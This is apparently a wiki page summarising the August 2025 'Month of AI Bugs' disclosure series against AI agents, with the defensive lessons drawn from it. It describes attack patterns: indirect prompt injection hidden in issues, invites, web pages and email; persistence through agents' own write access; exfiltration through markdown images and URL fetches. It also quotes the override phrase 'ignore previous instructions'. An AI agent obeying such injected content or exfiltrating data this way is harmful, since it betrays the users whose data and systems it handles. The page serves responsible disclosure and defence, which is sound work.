Month of AI Bugs (August 2025)

Summary

A coordinated disclosure series in August 2025, organized by Johann Rehberger (Embrace The Red), modeled on the earlier-era “Month of Browser Bugs” / “Month of Bugs” tradition from offensive security. Over the calendar month, dozens of responsibly-reported successful attacks were cataloged against every frontier model and every major agentic development kit.

The series is significant not because any individual disclosure was novel in mechanism — most were indirect prompt injections leading to tool-abuse chains or data exfiltration — but because the breadth and consistency of the failures across vendors established that the agentic-AI security gap is structural, not vendor-specific.

The most-cited disclosure from the series is the Jules AI kill chain, a five-stage compromise of Google’s coding agent.

Why It Matters

The Month of AI Bugs reframed the agentic-AI security conversation in three ways:

  1. From “exists in the lab” to “exists in production.” Before August 2025, vendor security marketing could plausibly claim that frontier models had injection resistance “in production deployments.” The series demonstrated that vendor agent products were vulnerable in the same configurations customers were using.
  2. From “single-vendor problem” to “structural problem.” Failures appeared across Google, OpenAI, Anthropic, Microsoft, Meta, and major open-source frameworks. No vendor was clean. This shifted the framing from “Vendor X has a bug” to “the agentic-AI threat model has not been resolved by anyone.”
  3. From “research curiosity” to “responsible-disclosure infrastructure.” The series generated formal disclosures, CVE assignments where applicable, and vendor patches. It established a precedent that AI-agent vulnerabilities flow through the same disclosure channels as traditional security bugs.

Cross-Cutting Patterns From the Series

Drawing on Securing Your Agents (slide 13–14) and Rehberger’s public summaries:

  • Indirect injection dominated. Direct “ignore previous instructions” attempts were the minority. The high-impact disclosures used hidden injections in GitHub issues, calendar invites, web pages, document metadata, and email bodies.
  • Coding agents were over-represented as targets. They have file/network access, persistent state, and routinely ingest user-influenceable content (issues, PRs, READMEs, commit messages).
  • Persistence-in-agent was a recurring theme. Multiple disclosures showed attackers using the agent’s own write capabilities to embed payloads that survive session restarts.
  • No vendor had egress filtering by default. Outbound-network capability was a load-bearing element of nearly every exfiltration chain.
  • Markdown image rendering and URL-fetch side channels were a consistent exfiltration pattern across chat-style products.

Connection to Other Wiki Pages

Defensive Takeaways the Series Established

  1. Assume injection succeeds; design for containment. This became the default posture in subsequent enterprise agent-security writing (see Prompt Injection Containment for Agentic Systems).
  2. Egress filtering is non-optional for any agent with both private-data and untrusted-content exposure (the Lethal Trifecta).
  3. Sandboxing is necessary, not paranoid. See Agent Sandboxing.
  4. Anomaly detection on tool-call sequences catches what input-layer detection misses. See Agent Observability.
  5. Coding agents need bespoke threat modeling distinct from chat-style agents.

Sources

  • Primary aggregator: Johann Rehberger, Embrace The Red blog, August 2025 series.
  • Public summary referenced in: Securing Your Agents, Bill McIntyre, 2026 (slide 13).

See Also